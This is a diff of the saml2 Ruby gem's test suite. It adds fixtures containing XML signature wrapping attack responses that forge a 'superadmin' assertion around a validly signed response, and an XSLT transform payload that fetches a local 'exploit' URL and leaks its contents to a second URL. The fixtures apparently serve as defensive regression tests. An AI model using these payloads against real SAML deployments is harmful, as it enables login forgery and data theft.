saml2 2.1.0 → 2.2.0

data/spec/fixtures/xml_signature_wrapping_attack_response_attributes.xml

@@ -0,0 +1,45 @@
+<!-- = = = = = = = = = = = = = = -->
+<!-- unsigned malicious envelope -->
+<!-- = = = = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="attackergenerated1" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+  <samlp:Status>
+    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+    <samlp:StatusDetail>
+<!-- = = = = = = = = = = = -->
+<!-- valid signed response -->
+<!-- = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
+    </samlp:StatusDetail>
+  </samlp:Status>
+
+  <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="attackergenerated2" Version="2.0" IssueInstant="2012-08-03T20:07:15Z">
+    <saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+    <saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e">
+      <saml:AuthnContext>
+        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
+      </saml:AuthnContext>
+    </saml:AuthnStatement>
+    <saml:Subject>
+      <saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">superadmin</saml:NameID>
+    </saml:Subject>
+    <!-- = = = = = = = = = = = = = = = -->
+    <!-- last attributes will win      -->
+    <!-- = = = = = = = = = = = = = = = -->
+    <saml:AttributeStatement>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin</saml:AttributeValue></saml:Attribute>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin@example.edu</saml:AttributeValue>
+      </saml:Attribute>
+    </saml:AttributeStatement>
+  </saml:Assertion>
+</samlp:Response>
+

data/spec/fixtures/xml_signature_wrapping_attack_response_nameid.xml

@@ -0,0 +1,44 @@
+<!-- = = = = = = = = = = = = = = -->
+<!-- unsigned malicious envelope -->
+<!-- = = = = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="attackergenerated1" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+  <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="attackergenerated2" Version="2.0" IssueInstant="2012-08-03T20:07:15Z">
+    <saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+    <saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e">
+      <saml:AuthnContext>
+        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
+      </saml:AuthnContext>
+    </saml:AuthnStatement>
+    <!-- = = = = = = = = = = = = = = = -->
+    <!-- first nameid will win         -->
+    <!-- = = = = = = = = = = = = = = = -->
+    <saml:Subject>
+      <saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">superadmin</saml:NameID>
+    </saml:Subject>
+    <saml:AttributeStatement>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin</saml:AttributeValue></saml:Attribute>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin@example.edu</saml:AttributeValue>
+      </saml:Attribute>
+    </saml:AttributeStatement>
+  </saml:Assertion>
+  <samlp:Status>
+    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+    <samlp:StatusDetail>
+<!-- = = = = = = = = = = = -->
+<!-- valid signed response -->
+<!-- = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
+    </samlp:StatusDetail>
+  </samlp:Status>
+</samlp:Response>
+

data/spec/fixtures/xslt-transform-response.xml

@@ -0,0 +1,57 @@
+<?xml version="1.0"?>
+<samlp:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rbd1ca4d500b80130b5178ada0d47c52294f418ad" Version="2.0" IssueInstant="2014-06-03T12:43:56Z" Destination="">
+ <saml:Issuer>https://app.example.com/saml/</saml:Issuer>
+ <samlp:Status>
+   <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+ </samlp:Status>
+ <saml:Assertion xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="2.0" ID="pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be" IssueInstant="2014-06-03T12:43:56Z">
+   <saml:Issuer>https://app.example.com/saml/</saml:Issuer>
+   <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+     <ds:SignedInfo>
+       <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+       <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+       <ds:Reference URI="#pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be">
+         <ds:Transforms>
+           <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
+           <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+           <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+             <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                 <xsl:template match="/">
+                     <xsl:variable name="exploit" select="document('http://127.0.0.1:2345/exploit')" />
+                     <xsl:variable name="exploitUrl" select="concat('http://127.0.0.1:2345/here',substring($exploit, 1, 5))" />
+                     <xsl:value-of select="document($exploitUrl)"/>
+                 </xsl:template>
+             </xsl:stylesheet>
+           </ds:Transform>
+         </ds:Transforms>
+         <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
+         <ds:DigestValue>Q40aDbTJ0gA35qMt9bk6RLDaHM8=</ds:DigestValue>
+       </ds:Reference>
+     </ds:SignedInfo>
+     <ds:SignatureValue>evqiVwhRAqUlLxQrzmmKQ/TNVseqj4k0dO8CghneerLLW5mHqOPLQrAFyBgr8BK5
+gqmnFnm8a6rjSuqMj8xCTVGq4jXwz38WXx8iYCP1pQJASzWPFq9HicHoGVo9UT7a
+xyrTA51M+HswpueFnwE8anx0llBDNisxjZMX7ixdwc8=</ds:SignatureValue>
+     <ds:KeyInfo>
+       <ds:X509Data>
+         <ds:X509Certificate>MIIECDCCAvCgAwIBAgIUH1Nywt/+Cklv5RvuPPer8PNG7ggwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MB4XDTEzMTEyNjE2MjgwN1oXDTE4MTEyNzE2MjgwN1owUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxINN52pg/eD9k4REEKq+1VQ+f7RxYVm0D2iTpJjFhBCi8jKhwMgQGqt/4x3iTx6i0swgi0xZIwMdsBlAB/83AFuXSK6hmZCY08zyM7x+wvj3EWwwC6fokvZvbb0PuIg7d4xgkMiSpDsCMg9XiDJytp8Obokmc0EPc0xEWdwIIwhPpy4TAdswcD5aTXnBn9fB/KRdmVR7VvnqCWqdTmOd3RxvvpcnLOHsycumGLVWukBNxHExALU6yTGMesJbg0fPhoN+MHxNYfe8NWBKFVEjdcvfVC9Ivemzj2xGDU1xMZ+v8uqt0pVV1LOmNcs5CvpMhZFSQFcu8dk77AAY2MJthQIDAQABo4HTMIHQMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFK2I7+srPutX2VzEnIwGmtCofTuhMIGQBgNVHSMEgYgwgYWAFK2I7+srPutX2VzEnIwGmtCofTuhoVekVTBTMQswCQYDVQQGEwJVUzEMMAoGA1UECgwDcnViMRUwEwYDVQQLDAxPbmVMb2dpbiBJZFAxHzAdBgNVBAMMFk9uZUxvZ2luIEFjY291bnQgMzUzNzaCFB9TcsLf/gpJb+Ub7jz3q/DzRu4IMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQUFAAOCAQEAnfgwE60ClcQ80b+GaFtEImzWlW7jIxpljSeRJ9Rbd6SSRxSck0Xwz17jtCnOaBeQ2igGyQfJA5R2OymaG9RqehGFdVEFbPC4OFwO1byUoGII9tReSKqtlemaEamgDLoYnnGVjFQ4/0EX4Ax2SjKNqwt+TgQykixfoo4GmCeFSSZnkoOEHUUWRDLqKK40AySnO8qA38g7fL+calsjqIcefy5Z5X1uybcFuif4IRvB6FpOMTPNj507cpCuqZw/sujVO+I00XD9VwuPT6TH9WerJp4Ye8J4HynADKsg6oJd61cqvQn33seNLIB/uA2U2uK/EY5c7m3I2VDgBDODbNZTng==</ds:X509Certificate>
+       </ds:X509Data>
+     </ds:KeyInfo>
+   </ds:Signature>
+   <saml:Subject>
+     <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.com</saml:NameID>
+     <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+       <saml:SubjectConfirmationData NotOnOrAfter="2014-06-03T12:46:56Z" Recipient=""/>
+     </saml:SubjectConfirmation>
+   </saml:Subject>
+   <saml:Conditions NotBefore="2014-06-03T12:40:56Z" NotOnOrAfter="2014-06-03T12:46:56Z">
+     <saml:AudienceRestriction>
+       <saml:Audience/>
+     </saml:AudienceRestriction>
+   </saml:Conditions>
+   <saml:AuthnStatement AuthnInstant="2014-06-03T12:43:55Z" SessionNotOnOrAfter="2014-06-04T12:43:56Z" SessionIndex="_c01bb660-cd47-0131-de03-782bcb56fcaa">
+     <saml:AuthnContext>
+       <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
+     </saml:AuthnContext>
+   </saml:AuthnStatement>
+ </saml:Assertion>
+</samlp:Response>

data/spec/lib/attribute_spec.rb

@@ -94,4 +94,21 @@ XML
     end
 
   end
+
+  describe AttributeStatement do
+    describe "#to_h" do
+      it "works" do
+        attr_statement = Response.parse(fixture("response_with_attribute_signed.xml")).assertions.first.attribute_statements.first
+        expect(attr_statement.to_h).to eq('givenName' => 'cody')
+        expect(attr_statement.to_h(:name)).to eq("urn:oid:2.5.4.42" => 'cody')
+      end
+
+      it "infers friendly names if possible" do
+        attr_statement = Response.parse(fixture("test3-response.xml")).assertions.first.attribute_statements.first
+        expect(attr_statement.to_h).to eq({
+            'eduPersonAffiliation' => 'member',
+            'eduPersonPrincipalName' => 'student@example.edu'})
+      end
+    end
+  end
 end

data/spec/lib/conditions_spec.rb

@@ -6,10 +6,10 @@ module SAML2
       expect(Conditions.new.valid?).to eq true
     end
 
-    it "should be valid with unknown condition" do
+    it "should be invalid with unknown condition" do
       conditions = Conditions.new
       conditions << Conditions::Condition.new
-      expect(conditions.valid?).to eq nil
+      expect(conditions.valid?).to eq false
     end
 
     it "should be valid with timestamps" do

data/spec/lib/response_spec.rb

@@ -2,7 +2,8 @@ require_relative '../spec_helper'
 
 module SAML2
   describe Response do
-    let(:sp) { Entity.parse(fixture('service_provider.xml')).roles.first }
+    let(:sp_entity) { Entity.parse(fixture('service_provider.xml')) }
